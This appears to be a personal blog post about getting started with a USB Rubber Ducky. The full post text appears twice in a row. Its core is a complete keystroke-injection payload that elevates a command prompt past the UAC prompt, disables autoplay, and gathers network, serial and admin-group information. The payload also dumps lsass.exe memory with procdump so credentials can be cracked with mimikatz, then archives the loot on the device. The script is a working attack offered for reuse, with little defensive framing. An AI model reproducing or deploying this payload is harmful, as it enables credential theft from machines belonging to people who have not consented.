RubberDUcky
So I just got a rubber ducky and have been playing around with it
Here is some of my first couple of days
1st thing I did was import the lanugauge in Notepad++ to write my scripts in
you can find the xml file here (https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/)
I also set a custom console to compile the scripts using the duckencoder.jar
CD: C:\users\********\Desktop\Ducky
Current directory: C:\users\******\Desktop\Ducky
java -jar duckencoder.jar -i ipconfig -o inject.bin
I also changed the firmware to twin ducky so I can read/write to the SD card while running payload
https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/
My first little scrip I borrowed a bit from some other posts but i'm still not entirely happy with it
REM *** UAC Bypass ***
DELAY 3000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 200
STRING reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers /v DisableAutoplay /t REG_DWORD /d 1 /f
ENTER
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "_"') do set duck=%d
ENTER
DELAY 100
STRING RMdir /s /q %duck%\Finds
ENTER
DELAY 100
STRING set duckytemp=C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir %duck%\Finds\%computername%
DELAY 100
ENTER
STRING set duckypath=%duck%\Finds\%computername%
ENTER
DELAY 100
STRING ipconfig /all > %duckytemp%\%computername%.ipconfig.txt
ENTER
DELAY 200
STRING wmic bios get serialnumber > %duckytemp%\%computername%.serial.txt
ENTER
DELAY 100
STRING net localgroup administrators > %duckytemp%\%computername%.admins.txt
ENTER
DELAY 100
STRING %duck%\procdump64.exe -accepteula -ma lsass.exe %duckytemp%\%computername%.lsass.dmp
ENTER
DELAY 3000
STRING %duck%\7za.exe a %duckytemp%\%computername%.7z %duckytemp%\*
ENTER
STRING
DELAY 5000
STRING rmdir /s /q %duckytemp%
ENTER
STRING exit
ENTER
So what I'm doing here is dumping the output of ipconfig /all, getting the serial number of the computer, getting a list of the admin users and dumping the lsass for decrypting with mimikatz later
I write these all to a temp directory on a computer, then zip them up and copy them to the flash drive........
the write speed is stupid slow so this isn't a great solution and take about 4 minutes to run completely
I think uploading the zip file to an external storage location is probably a better solution, I just don't have the time to do that right now
So I just got a rubber ducky and have been playing around with it
Here is some of my first couple of days
1st thing I did was import the lanugauge in Notepad++ to write my scripts in
you can find the xml file here (https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/)
I also set a custom console to compile the scripts using the duckencoder.jar
CD: C:\users\********\Desktop\Ducky
Current directory: C:\users\******\Desktop\Ducky
java -jar duckencoder.jar -i ipconfig -o inject.bin
I also changed the firmware to twin ducky so I can read/write to the SD card while running payload
https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/
My first little scrip I borrowed a bit from some other posts but i'm still not entirely happy with it
REM *** UAC Bypass ***
DELAY 3000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 200
STRING reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers /v DisableAutoplay /t REG_DWORD /d 1 /f
ENTER
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "_"') do set duck=%d
ENTER
DELAY 100
STRING RMdir /s /q %duck%\Finds
ENTER
DELAY 100
STRING set duckytemp=C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir %duck%\Finds\%computername%
DELAY 100
ENTER
STRING set duckypath=%duck%\Finds\%computername%
ENTER
DELAY 100
STRING ipconfig /all > %duckytemp%\%computername%.ipconfig.txt
ENTER
DELAY 200
STRING wmic bios get serialnumber > %duckytemp%\%computername%.serial.txt
ENTER
DELAY 100
STRING net localgroup administrators > %duckytemp%\%computername%.admins.txt
ENTER
DELAY 100
STRING %duck%\procdump64.exe -accepteula -ma lsass.exe %duckytemp%\%computername%.lsass.dmp
ENTER
DELAY 3000
STRING %duck%\7za.exe a %duckytemp%\%computername%.7z %duckytemp%\*
ENTER
STRING
DELAY 5000
STRING rmdir /s /q %duckytemp%
ENTER
STRING exit
ENTER
So what I'm doing here is dumping the output of ipconfig /all, getting the serial number of the computer, getting a list of the admin users and dumping the lsass for decrypting with mimikatz later
I write these all to a temp directory on a computer, then zip them up and copy them to the flash drive........
the write speed is stupid slow so this isn't a great solution and take about 4 minutes to run completely
I think uploading the zip file to an external storage location is probably a better solution, I just don't have the time to do that right now
Comments
Post a Comment